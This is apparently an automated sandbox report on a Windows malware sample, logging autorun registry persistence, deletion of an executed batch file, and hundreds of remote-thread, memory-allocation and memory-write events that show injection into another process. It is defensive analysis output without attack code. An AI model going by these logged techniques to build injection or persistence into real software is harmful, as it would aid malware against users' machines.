NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00570000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Yjjdwkj

reg_value

C:\Users\Public\Libraries\jkwdjjY.url

Deletes executed files from disk (1 event)

file	C:\Users\Public\UKO.bat

Creates a thread using CreateRemoteThread in a non-child process indicative of process injection (50 out of 287 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2776 created a remote thread in non-child process 492
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 3028 process_identifier: 492 function_address: 0x000d0000 flags: 0 stack_size: 0 parameter: 0x00000000 process_handle: 0x00000520	1	1320	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2324 process_identifier: 492 function_address: 0x00110000 flags: 0 stack_size: 0 parameter: 0x00100000 process_handle: 0x00000520	1	1320	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 1048 process_identifier: 492 function_address: 0x001f0000 flags: 0 stack_size: 0 parameter: 0x001e0000 process_handle: 0x00000520	1	1316	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2672 process_identifier: 492 function_address: 0x002f0000 flags: 0 stack_size: 0 parameter: 0x002a0000 process_handle: 0x00000520	1	1324	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2112 process_identifier: 492 function_address: 0x00330000 flags: 0 stack_size: 0 parameter: 0x00320000 process_handle: 0x00000520	1	1328	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2932 process_identifier: 492 function_address: 0x00370000 flags: 0 stack_size: 0 parameter: 0x00360000 process_handle: 0x00000520	1	1332	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 668 process_identifier: 492 function_address: 0x003f0000 flags: 0 stack_size: 0 parameter: 0x003e0000 process_handle: 0x00000520	1	1336	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 1296 process_identifier: 492 function_address: 0x00430000 flags: 0 stack_size: 0 parameter: 0x00420000 process_handle: 0x00000520	1	1340	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2664 process_identifier: 492 function_address: 0x00470000 flags: 0 stack_size: 0 parameter: 0x00460000 process_handle: 0x00000520	1	1344	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2532 process_identifier: 492 function_address: 0x004b0000 flags: 0 stack_size: 0 parameter: 0x004a0000 process_handle: 0x00000520	1	1348	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 1632 process_identifier: 492 function_address: 0x004f0000 flags: 0 stack_size: 0 parameter: 0x004e0000 process_handle: 0x00000520	1	1352	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2840 process_identifier: 492 function_address: 0x00530000 flags: 0 stack_size: 0 parameter: 0x00520000 process_handle: 0x00000520	1	1356	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2092 process_identifier: 492 function_address: 0x00570000 flags: 0 stack_size: 0 parameter: 0x00560000 process_handle: 0x00000520	1	1360	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 1120 process_identifier: 492 function_address: 0x005b0000 flags: 0 stack_size: 0 parameter: 0x005a0000 process_handle: 0x00000520	1	1364	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2408 process_identifier: 492 function_address: 0x005f0000 flags: 0 stack_size: 0 parameter: 0x005e0000 process_handle: 0x00000520	1	1368	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 1808 process_identifier: 492 function_address: 0x00640000 flags: 0 stack_size: 0 parameter: 0x00630000 process_handle: 0x00000520	1	1372	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2772 process_identifier: 492 function_address: 0x00680000 flags: 0 stack_size: 0 parameter: 0x00670000 process_handle: 0x00000520	1	1376	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2572 process_identifier: 492 function_address: 0x008d0000 flags: 0 stack_size: 0 parameter: 0x006b0000 process_handle: 0x00000520	1	1380	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2696 process_identifier: 492 function_address: 0x01fa0000 flags: 0 stack_size: 0 parameter: 0x01f90000 process_handle: 0x00000520	1	1384	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 1760 process_identifier: 492 function_address: 0x01fe0000 flags: 0 stack_size: 0 parameter: 0x01fd0000 process_handle: 0x00000520	1	1388	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 1420 process_identifier: 492 function_address: 0x02020000 flags: 0 stack_size: 0 parameter: 0x02010000 process_handle: 0x00000520	1	1392	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2620 process_identifier: 492 function_address: 0x02060000 flags: 0 stack_size: 0 parameter: 0x02050000 process_handle: 0x00000520	1	1396	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2200 process_identifier: 492 function_address: 0x020a0000 flags: 0 stack_size: 0 parameter: 0x02090000 process_handle: 0x00000520	1	1400	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2908 process_identifier: 492 function_address: 0x020e0000 flags: 0 stack_size: 0 parameter: 0x020d0000 process_handle: 0x00000520	1	1404	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2552 process_identifier: 492 function_address: 0x02120000 flags: 0 stack_size: 0 parameter: 0x02110000 process_handle: 0x00000520	1	1408	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 1316 process_identifier: 492 function_address: 0x02160000 flags: 0 stack_size: 0 parameter: 0x02150000 process_handle: 0x00000520	1	1412	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2196 process_identifier: 492 function_address: 0x021a0000 flags: 0 stack_size: 0 parameter: 0x02190000 process_handle: 0x00000520	1	1416	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 1204 process_identifier: 492 function_address: 0x021e0000 flags: 0 stack_size: 0 parameter: 0x021d0000 process_handle: 0x00000520	1	1420	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 260 process_identifier: 492 function_address: 0x02220000 flags: 0 stack_size: 0 parameter: 0x02210000 process_handle: 0x00000520	1	1424	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2540 process_identifier: 492 function_address: 0x02260000 flags: 0 stack_size: 0 parameter: 0x02250000 process_handle: 0x00000520	1	1428	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2492 process_identifier: 492 function_address: 0x022a0000 flags: 0 stack_size: 0 parameter: 0x02290000 process_handle: 0x00000520	1	1432	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 1188 process_identifier: 492 function_address: 0x022e0000 flags: 0 stack_size: 0 parameter: 0x022d0000 process_handle: 0x00000520	1	1436	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2356 process_identifier: 492 function_address: 0x02320000 flags: 0 stack_size: 0 parameter: 0x02310000 process_handle: 0x00000520	1	1440	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 808 process_identifier: 492 function_address: 0x02360000 flags: 0 stack_size: 0 parameter: 0x02350000 process_handle: 0x00000520	1	1444	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 3020 process_identifier: 492 function_address: 0x023a0000 flags: 0 stack_size: 0 parameter: 0x02390000 process_handle: 0x00000520	1	1448	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2832 process_identifier: 492 function_address: 0x023e0000 flags: 0 stack_size: 0 parameter: 0x023d0000 process_handle: 0x00000520	1	1452	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2692 process_identifier: 492 function_address: 0x02420000 flags: 0 stack_size: 0 parameter: 0x02410000 process_handle: 0x00000520	1	1456	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 1816 process_identifier: 492 function_address: 0x02460000 flags: 0 stack_size: 0 parameter: 0x02450000 process_handle: 0x00000520	1	1460	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2300 process_identifier: 492 function_address: 0x024a0000 flags: 0 stack_size: 0 parameter: 0x02490000 process_handle: 0x00000520	1	1464	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2656 process_identifier: 492 function_address: 0x024e0000 flags: 0 stack_size: 0 parameter: 0x024d0000 process_handle: 0x00000520	1	1468	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2412 process_identifier: 492 function_address: 0x02520000 flags: 0 stack_size: 0 parameter: 0x02510000 process_handle: 0x00000520	1	1472	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 812 process_identifier: 492 function_address: 0x02560000 flags: 0 stack_size: 0 parameter: 0x02550000 process_handle: 0x00000520	1	1476	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2644 process_identifier: 492 function_address: 0x025a0000 flags: 0 stack_size: 0 parameter: 0x02590000 process_handle: 0x00000520	1	1480	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2472 process_identifier: 492 function_address: 0x025e0000 flags: 0 stack_size: 0 parameter: 0x025d0000 process_handle: 0x00000520	1	1484	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 852 process_identifier: 492 function_address: 0x02620000 flags: 0 stack_size: 0 parameter: 0x02610000 process_handle: 0x00000520	1	1488	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 200 process_identifier: 492 function_address: 0x02660000 flags: 0 stack_size: 0 parameter: 0x02650000 process_handle: 0x00000520	1	1492	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2976 process_identifier: 492 function_address: 0x026a0000 flags: 0 stack_size: 0 parameter: 0x02690000 process_handle: 0x00000520	1	1496	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2952 process_identifier: 492 function_address: 0x026e0000 flags: 0 stack_size: 0 parameter: 0x026d0000 process_handle: 0x00000520	1	1500	0
CreateRemoteThread Aug. 10, 2021, 5:42 p.m.	thread_identifier: 2288 process_identifier: 492 function_address: 0x02720000 flags: 0 stack_size: 0 parameter: 0x02710000 process_handle: 0x00000520	1	1504	0

Manipulates memory of a non-child process indicative of process injection (50 out of 1104 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2776 manipulating memory of non-child process 492
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 495616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10410000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00100000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00110000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x001c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x001d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x001f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00240000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00290000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00300000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00310000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00320000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00330000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00340000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00350000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00360000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00380000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00390000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00410000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00420000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00430000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00440000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00450000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00490000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00500000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00510000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00520000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00530000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00540000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00550000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0
NtAllocateVirtualMemory Aug. 10, 2021, 5:42 p.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00560000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0

Potential code injection by writing to the memory of another process (50 out of 1103 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2776 injected into non-child 492
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: h ÿ hÿ ×IsuÕ?wKERNEL32.dllÿ4û8Tú8¾t½rú8É½r ý~hú8la½rQy½r ý~ú8:½r6;Ãrû8mØ¾rÜú8Üú8ÿÿÿÿHû84û8?pÿ$p$û8,%pìú8\¦ä`¦ä$û8QAqYAqXû8äEp base_address: 0x000d0000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: CreateToolhelp32Snapshot base_address: 0x000e0000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: KERNEL32.dll base_address: 0x000f0000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: Õ?w"suEsu base_address: 0x00100000 process_identifier: 492 process_handle: 0x00000520	1	1	0
